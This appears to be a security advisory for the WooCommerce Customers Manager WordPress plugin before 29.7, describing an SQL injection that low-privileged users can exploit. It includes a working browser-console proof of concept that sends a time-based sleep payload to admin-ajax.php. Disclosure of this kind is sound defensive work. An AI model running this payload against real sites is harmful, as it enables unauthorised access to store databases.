WooCommerce Customers Manager < 29.7 - Subscriber+ SQL Injection

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role. Note: v29.5 added authorisation, however the injection was not fixed and still exploitable by users with the manage_woocommerce capability, such as Shop Manager and above

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user and note the 20s delayed response fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=wccm_get_orders_tot_num&start;_date=2024-01-09&end;_date=2024-01-11&min;_amount=0&max;_amount=0&min;_amount_total=0&product;_relationship=or&product;_category_relationship=or&product;_category_filters_relationship=and&statuses;=wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft&max;_amount_total=(select*from(select(sleep(20)))a)’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));